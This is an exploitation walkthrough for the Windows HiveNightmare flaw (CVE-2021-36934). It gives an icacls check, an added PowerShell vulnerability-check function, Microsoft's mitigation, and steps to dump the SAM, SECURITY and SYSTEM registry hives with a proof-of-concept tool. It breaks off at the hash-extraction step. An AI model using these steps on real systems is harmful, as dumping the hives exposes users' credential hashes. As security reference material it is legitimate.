CVE-2021-36934 HiveNightmare

1 - Check if target is vulnerable

C:\hacker> icacls c:\Windows\System32\config\SAM

C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

We are vulnerable since the SAM hive is readable by BUILTIN\Users (the `(I)(RX)` entry above); the SECURITY and SYSTEM hives in the same directory are normally affected in the same way.


Successful exploitation also requires the presence of one or more shadow copies (snapshots), because the live hive files are held open by the kernel and can only be read from a snapshot. Most Windows 10 systems have System Protection enabled by default, which creates shadow copies.
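As an added, read-only check (not part of the original page) that automates step 1 together with the shadow-copy precondition: it reports whether BUILTIN\Users (S-1-5-32-545) can read the SAM, SECURITY and SYSTEM hives and whether VSS snapshots exist. It assumes Windows PowerShell 5.1 or later; the snapshot query only succeeds from an elevated shell.

```powershell
# Added example, not from the original page: checks the two preconditions
# described above without touching the hive contents.
function Test-HiveNightmare {
    $hivePaths = 'SAM', 'SECURITY', 'SYSTEM' | ForEach-Object {
        Join-Path $env:SystemRoot "System32\config\$_"
    }
    $usersSid = 'S-1-5-32-545'   # BUILTIN\Users, independent of display language
    $readData = [int][System.Security.AccessControl.FileSystemRights]::ReadData

    # Reading a security descriptor only needs READ_CONTROL, so Get-Acl works
    # here even though the hive files themselves are locked by the kernel.
    $exposed = foreach ($path in $hivePaths) {
        $acl = Get-Acl -Path $path
        foreach ($ace in $acl.Access) {
            $sid = $ace.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
            if ($sid -eq $usersSid -and
                $ace.AccessControlType -eq 'Allow' -and
                (([int]$ace.FileSystemRights -band $readData) -ne 0)) {
                $path
                break
            }
        }
    }
    $exposed = @($exposed)

    # Win32_ShadowCopy enumeration is only permitted for administrators;
    # report "unknown" instead of guessing when the query is denied.
    try {
        $shadowCount = @(Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction Stop).Count
    } catch {
        $shadowCount = $null
    }

    $result = [pscustomobject]@{
        ExposedHives  = $exposed
        HivesReadable = ($exposed.Count -gt 0)
        ShadowCopies  = if ($null -eq $shadowCount) { 'unknown (run elevated)' } else { $shadowCount }
        Vulnerable    = 'unknown'
    }
    if ($null -ne $shadowCount) {
        $result.Vulnerable = ($exposed.Count -gt 0) -and ($shadowCount -gt 0)
    }
    $result
}

Test-HiveNightmare | Format-List
```

Microsoft's documented workaround for this CVE is to restore the inherited ACLs on the hive files (`icacls %windir%\system32\config\*.* /inheritance:e`) and then delete the existing shadow copies, which also discards those restore points.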

2 - Dump Registry Hives

This PoC can be used:

.\HiveNightmare.exe

3 - Extract Hashes from dump

From a linux host:
